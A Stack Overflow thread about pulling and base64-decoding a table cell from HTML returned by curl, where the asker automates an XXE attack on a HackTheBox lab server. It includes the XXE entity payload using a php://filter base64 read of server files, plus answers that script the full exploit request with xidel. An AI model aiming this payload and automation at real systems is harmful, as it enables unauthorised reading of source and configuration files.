
I am trying to remove the <td> and </td> from a curl output. The output gives a table view that looks like this:

If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>fdsf</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>dsfsdf</td>
  </tr>
</table>

Under the CWE: column is some base64 I want to decode. Here is what I have tried:

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file

# sed: -e expression #1, char 9: unknown option to `s'
cat file | grep "<td>" | sed 's/<td>//g'| sed 's/</td>//g' | sed '1,3d' | sed '2,5d' | tr -d " "

Only, I keep getting

sed: -e expression #1, char 9: unknown option to `s'

on the cat file line.

Update: Using xmllint

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file|sed '1,1d')

Gives me this:

warning: failed to load external entity "<table>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Title:</td>"
warning: failed to load external entity "<td>dsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>CWE:</td>"
warning: failed to load external entity "<td>BASE 64 WOULD BE HERE</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Score:</td>"
warning: failed to load external entity "<td>fdsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Reward:</td>"
warning: failed to load external entity "<td>dsfsdf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "</table>"

Update more:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | sed '1, 1d' | xmllint --html --xpath /table/tbody/tr[2]/td[2] -

XPath set is empty

Jaquarh
  • Do you have a compelling reason not to use HTML-aware tools for this? Python ships with several lxml libraries, and modern Linux distros include `xmllint` and similar tools that can be run from the command line. See f/e [xmllint to parse a html file](https://stackoverflow.com/questions/42680061/xmllint-to-parse-a-html-file) – Charles Duffy Aug 12 '21 at 17:21
  • `xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file)` isn't working @CharlesDuffy – Jaquarh Aug 12 '21 at 17:30
  • `$(cat file)`? Of course it wouldn't work -- that reads your input file, breaks it into individual command line arguments and puts them on xmllint's command line. Why would you ever want to do that? Use the linked question's answers the way it says to use them, don't make up your own broken thing and then ask why it's broken. – Charles Duffy Aug 12 '21 at 17:31
  • [Don't Parse XML/HTML With Regex.](https://stackoverflow.com/a/1732454/3776858) I suggest to use an XML/HTML parser (xmlstarlet, xmllint ...). – Cyrus Aug 12 '21 at 17:33
  • while we've got some sample input: `If DB were ready ... `, we don't have the matching expected output; please update the question with the expected output – markp-fuso Aug 12 '21 at 17:33
  • So the "failed to load external entity" errors are completely normal when you do the silly `$(cat file)` thing and put each word from your HTML file into a different command line argument to xmllint. – Charles Duffy Aug 12 '21 at 17:34
  • That is the input and the expected output is the `SSBBTSBTT01FIEJBU0U2NAo=` base64 @markp-fuso – Jaquarh Aug 12 '21 at 17:34
  • Correct usage would be more like `xmllint --html --xpath '/table/tbody/tr[2]/td[2]' -` – Charles Duffy Aug 12 '21 at 17:35
  • Oh ya, I wrapped it in quotes `"$(cat file|sed '1,1d')"` and now I just get one warning @CharlesDuffy – Jaquarh Aug 12 '21 at 17:35
  • Stop using `cat`. Nobody ever told you to use cat -- I didn't, the linked duplicate didn't, I don't know how you got the idea in your head. – Charles Duffy Aug 12 '21 at 17:35
  • Piping it to xmllint doesn't work, comes up with the help page lol @CharlesDuffy – Jaquarh Aug 12 '21 at 17:36
  • so explicitly state that in the question, eg: `expected output is:` `SSBBTSBTT01FIEJBU0U2NAo=` – markp-fuso Aug 12 '21 at 17:37
  • If the purpose of the cat call is to remove the first line, you can still do that. `curl ... | sed '1,1d' | xmllint ...` – Charles Duffy Aug 12 '21 at 17:37
  • "Under the CWE: column is some base64 I want to decode." wasn't clear enough? my bad @markp-fuso – Jaquarh Aug 12 '21 at 17:37
  • @Jaquarh, **show us** how you did the pipeline. If you left out the `-`, that would cause an error. Don't make me trust that you did something right and still get an error, **show me** that you're doing it right and still get the error. – Charles Duffy Aug 12 '21 at 17:37
  • `curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --html --xpath /table/tbody/tr[2]/td[2]` @CharlesDuffy – Jaquarh Aug 12 '21 at 17:38
  • @Jaquarh, that's exactly the thing I told you not to do, leaving out the `-` – Charles Duffy Aug 12 '21 at 17:38
  • ahhh I see, now I get `XPath set is empty` =D @CharlesDuffy – Jaquarh Aug 12 '21 at 17:38
  • Great, so now you just need to tune your xpath expression until it's a match for your input document. This is a much narrower/easier problem. :) – Charles Duffy Aug 12 '21 at 17:39
  • First, your question's HTML doesn't have a `tbody`, so why are you putting a `tbody` in your xpath expression? **Web browsers** reformat bad HTML into good HTML, so they'll add elements like that, but you aren't using a web browser here. – Charles Duffy Aug 12 '21 at 17:39
  • Oh ya... im confused why I did that too.... let me try correct this, not really good with xpaths @CharlesDuffy – Jaquarh Aug 12 '21 at 17:40
  • Ahh, I can't figure it out I tried `/table/tr[2]/td[2]` but `XPath set is empty` and yeah, I can't use a web browser because the `staging.txt` holds an XXE I'm trying to automate. I can manually `base64 -d` this but large files take time, to scroll through so I wanted to automate it so I can read source files via the XXE @CharlesDuffy – Jaquarh Aug 12 '21 at 17:45
  • Are you showing us the *whole* HTML file or just a subset? – Charles Duffy Aug 12 '21 at 17:51
  • I ask because `/table/...` assumes that the file starts with `<table>` at the top level; if it puts it inside `<html><body>...</body></html>`, then you need your XPath to be `/html/body/table` instead. – Charles Duffy Aug 12 '21 at 17:51
  • Or, of course, you can use `//table` to do an unrooted search. – Charles Duffy Aug 12 '21 at 17:53

3 Answers


Addressing the (original) issue of the sed error:

  • sed 's/</td>//g'
  • using / as a delimiter but / is also part of the string to be replaced
  • net result: sed sees an extra / which is a syntax issue
  • either switch to another delimiter that doesn't show up in the data (eg, |) or escape the data (eg, <\/td>)
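
Both fixes can be sketched as follows. This is a minimal illustration, not the asker's script: the sample row and the function names `strip_td_alt` and `strip_td_escaped` are made up for the example.

```shell
#!/bin/bash
# Hypothetical sample row, mirroring one line of the table in the question.
row='    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>'

# Option 1: use | as the delimiter, so the / in </td> needs no escaping.
strip_td_alt() {
  sed -e 's|<td>||g' -e 's|</td>||g'
}

# Option 2: keep / as the delimiter and escape the / inside the pattern.
strip_td_escaped() {
  sed -e 's/<td>//g' -e 's/<\/td>//g'
}

# Both print the bare cell content once the indentation is removed.
printf '%s\n' "$row" | strip_td_alt | tr -d ' '
printf '%s\n' "$row" | strip_td_escaped | tr -d ' '
```

Each of the two commands prints `SSBBTSBTT01FIEJBU0U2NAo=`.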

As for the bigger picture (parsing out the CWE: value) ...

Assuming an HTML-aware tool is not available, there's only one CWE: in the input, and the input is nicely formatted as shown, replace the cat/grep/sed/sed/sed/sed/tr mess and let awk do the work, eg:

awk -F'[<>]' '$3 ~ "CWE:" {printme=1;next} printme {print $3; exit}' file

This generates:

SSBBTSBTT01FIEJBU0U2NAo=
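
Since the stated goal is the decoded text, the awk output can be piped straight into `base64 -d`. A minimal sketch, assuming GNU coreutils `base64` and input laid out as in the question; the temporary file and the `extract_cwe` function name are illustrative only:

```shell
#!/bin/bash
# Recreate part of the sample response from the question in a temporary file.
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
</table>
EOF

# Print the cell on the line after the "CWE:" label, then decode it.
extract_cwe() {
  awk -F'[<>]' '$3 ~ "CWE:" {printme=1; next} printme {print $3; exit}' "$1" |
    base64 -d
}

extract_cwe "$sample"   # prints: I AM SOME BASE64
```

This still relies on the label and the value sitting on consecutive lines, so it breaks if the server ever changes its formatting.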
markp-fuso
  • Using a syntax-unaware tool to "parse" a list of security vulnerabilities is rich. – Charles Duffy Aug 12 '21 at 17:52
  • Thankyou!! My XXE uses `php://` filter to generate base64 encoded source files from the server: `<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./PLACEHOLDER" >]>` so I can now automatically just scrape the source code! I appreciate it! – Jaquarh Aug 12 '21 at 17:52
  • @CharlesDuffy uh, yep, and if OP is lucky it'll never bite 'em in the arse :-) – markp-fuso Aug 12 '21 at 17:57
  • its a hackthebox lab, not real world. I just like to automate my tools for the writeups @markp-fuso – Jaquarh Aug 12 '21 at 18:03
  • @Jaquarh, ...point of a lab is to teach you skills you can use in the real world, though. – Charles Duffy Aug 12 '21 at 18:09
  • What is wrong with that, a lot of people have jobs as pentesters @CharlesDuffy – Jaquarh Aug 12 '21 at 18:49
  • @Jaquarh, if you're a competent pentester, you should have a good sense of the extent to which sloppy implementations of parsers and protocols lead to vulnerabilities. If you're so focused on the red-team side of the job that you don't see the skills learnt there as better informing how the blue team should operate... well, I don't know what I can say. – Charles Duffy Aug 12 '21 at 18:54
  • @Jaquarh, so when I say "you can use in the real world", that should be read to mean things you can use _safely_, without inviting means by which your code can be induced to behave incorrectly. – Charles Duffy Aug 12 '21 at 18:58

To extract data from HTML files (assuming the markup is well-formed XML), try this one-liner:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --xpath '//td[text() = "CWE:"]/following-sibling::td/text()' - | base64 -d
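
The response shown in the question starts with a plain-text line and is HTML rather than strict XML, so a more forgiving variant drops that line, passes `--html`, and reads stdin via `-`. A sketch assuming `xmllint` (libxml2) and GNU `base64` are installed; the `cwe_from_html` name and the inline sample are illustrative, standing in for the curl output:

```shell
#!/bin/bash
# Read an HTML response on stdin and print the decoded CWE cell.
cwe_from_html() {
  sed '1d' |   # drop the leading "If DB were ready..." text line
    xmllint --html \
      --xpath '//td[text()="CWE:"]/following-sibling::td/text()' - 2>/dev/null |
    base64 -d
}

# Stand-in for the curl output from the question.
cwe_from_html <<'EOF'
If DB were ready, would have added:
<table>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
</table>
EOF
```

The unrooted `//td` search avoids having to guess whether the parser wrapped the table in `html` and `body` elements.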
Pierre François

Please don't use regex to parse HTML; use an HTML parser like xidel instead.

The final bit, extracting and decoding the base64 string:

$ xidel -s file -e '
  //td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
I AM SOME BASE64

Despite not knowing the content of your 'xxe.txt', xidel can probably also do all those steps for you:

$ xidel -s \
  -d 'data={file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>"))}' \
  "http://10.10.11.100/tracker_diRbPr00f314.php" \
  -e '//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))'

or

$ xidel -se '
  x:request({
    "post":"data="||file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>")),
    "url":"http://10.10.11.100/tracker_diRbPr00f314.php"
  })/doc//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
Reino